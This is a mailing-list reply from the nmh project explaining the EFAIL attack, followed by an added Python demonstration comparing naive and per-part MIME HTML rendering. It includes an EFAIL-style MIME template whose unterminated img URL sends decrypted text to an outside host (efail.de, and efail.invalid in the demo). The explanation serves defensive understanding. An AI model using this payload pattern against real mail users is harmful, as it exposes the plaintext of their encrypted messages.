>Michael Richardson writes:
>> And given EFAIL, it seems that we were wise.
>
>nmh wise? I dunno. Part of EFAIL was that the mail client downloaded
>bits from the Internet and interleaved them seamlessly into the message.
>That seems like an inherently dangerous thing to do... and nmh does it
>with one of the messages in this very thread: Ralph Corderoy's message
>contains a 'Content-Type: message/external-body; access-type="url";
>url="..."' bit that was promptly fetched and displayed in the middle of
>the message. How do I disable this behavior, and why does nmh have it
>turned ON by default!?
Respectfully ... the vulnerability with EFAIL was NOT that people downloaded stuff via HTTP. Kind of the exact opposite, actually ... MUAs were given a previously-encrypted message and tricked into decrypting it and uploading it by stitching together HTML content across multiple MIME parts. E.g.:

    --BOUNDARY
    Content-Type: text/html

    <img src="http://efail.de/
    --BOUNDARY
    Content-Type: application/pkcs7-mime; [...]
    Content-Transfer-Encoding: base64

    [... message attacker wants to decrypt ...]
    --BOUNDARY

    ">
    --BOUNDARY--

A poorly-written MUA would decrypt the message and then "fetch" the image because they would interpret all of the HTML parts as one continuous HTML content (notice the opening quote in the first HTML part does not contain a closing quote), and the URL would contain the decrypted text the attacker is interested in (presumably they got that via some other mechanism). And it turns out there are a lot of poorly-written MUAs!

I looked at this when it came out; I do not believe that even if we supported S/MIME or OpenPGP natively we would be vulnerable to EFAIL, because we pass each HTML part to its own HTML converter, so there is no HTML "state" that would be preserved across multipart boundaries. And even if it was an issue, the default HTML-to-text converters we use do not fetch images.

To the larger point ... I do not think there is any fundamental difference between being emailed a text/plain part and fetching it via HTTP; they both are coming across the wild Internet, and I think this applies to any content. The only possible disadvantage I can think of is that it would evade a virus checker that runs on your mail server, but since relatively few MUAs support message/external-body messages now I suspect it's highly unlikely that anyone would choose to distribute a virus in this way. I am open to being proven wrong, of course.

--Ken

-- 
nmh-workers
https://lists.nongnu.org/mailman/listinfo/nmh-workers
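The structural difference Ken describes (one HTML parser per MIME part versus gluing all parts into one document) can be checked directly. The following is an added example, not code from nmh or from anyone in this thread. It builds a constructed message in the shape of the example above, with a base64 part standing in for the S/MIME ciphertext (decrypt_part() only base64-decodes; there is no real decryption), a constructed host efail.invalid, and Python's html.parser as the renderer. The "naive" renderer concatenates every part before parsing and so produces an <img> src carrying the plaintext; the per-part renderer feeds each text/html part to a fresh parser and never sees the unterminated attribute close, so nothing would be fetched.

```python
"""Constructed EFAIL-shaped message rendered two ways: one HTML document
versus one parser per MIME part. Added example, not nmh's code."""
import base64
import email
from email import policy
from html.parser import HTMLParser

# Constructed "plaintext" that the attacker hopes to see in an image URL.
SECRET = "meet at dawn, the key is under the mat"

# Constructed message. The pkcs7 part is a stand-in: its "ciphertext" is
# just base64 so the example runs offline. efail.invalid is a placeholder host.
RAW_MESSAGE = (
    "From: attacker@example.invalid\n"
    "To: victim@example.invalid\n"
    "Subject: constructed EFAIL-shaped message\n"
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="BOUNDARY"\n'
    "\n"
    "--BOUNDARY\n"
    "Content-Type: text/html\n"
    "\n"
    '<img src="http://efail.invalid/\n'      # opening quote never closed
    "--BOUNDARY\n"
    "Content-Type: application/pkcs7-mime\n"
    "Content-Transfer-Encoding: base64\n"
    "\n"
    + base64.b64encode(SECRET.encode()).decode() + "\n"
    "--BOUNDARY\n"
    "Content-Type: text/html\n"
    "\n"
    '">\n'                                   # closing quote lives in another part
    "--BOUNDARY--\n"
)


class ImgSrcCollector(HTMLParser):
    """Records the src of every <img> start tag the parser actually emits,
    i.e. every URL a fetching renderer would request."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value is not None:
                    self.srcs.append(value)


def decrypt_part(part):
    """Stand-in for S/MIME decryption (assumption: no real crypto here);
    returns the decoded payload as text."""
    return part.get_payload(decode=True).decode("utf-8", "replace")


def rendered_parts(msg):
    """Yield (content_type, text) for each leaf part; pkcs7 parts are
    'decrypted' and handed on as text/plain, like a decrypting MUA would."""
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if ctype == "application/pkcs7-mime":
            yield "text/plain", decrypt_part(part)
        else:
            yield ctype, part.get_content()


def naive_render(msg):
    """The vulnerable pattern: every part, decrypted text included, is
    concatenated into one HTML document and parsed with one parser."""
    html = "".join(text.strip() for _, text in rendered_parts(msg))
    parser = ImgSrcCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def per_part_render(msg):
    """The pattern Ken describes: a fresh parser per text/html part, so no
    tag or attribute state survives a multipart boundary; non-HTML parts
    never enter an HTML parser at all."""
    srcs = []
    for ctype, text in rendered_parts(msg):
        if ctype != "text/html":
            continue
        parser = ImgSrcCollector()
        parser.feed(text)
        parser.close()
        srcs.extend(parser.srcs)
    return srcs


def leaks_secret(srcs):
    """True if any URL the renderer would fetch carries the plaintext."""
    return any(SECRET in s for s in srcs)


MSG = email.message_from_string(RAW_MESSAGE, policy=policy.default)

if __name__ == "__main__":
    print("naive render would fetch:   ", naive_render(MSG))
    print("per-part render would fetch:", per_part_render(MSG))
```

Running it shows the naive renderer producing a single URL that ends with the plaintext, while the per-part renderer produces nothing that contains it. Not fetching images at all, as the default HTML-to-text converters mentioned above do, closes the same channel from the other side: even a URL that is assembled is never requested.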
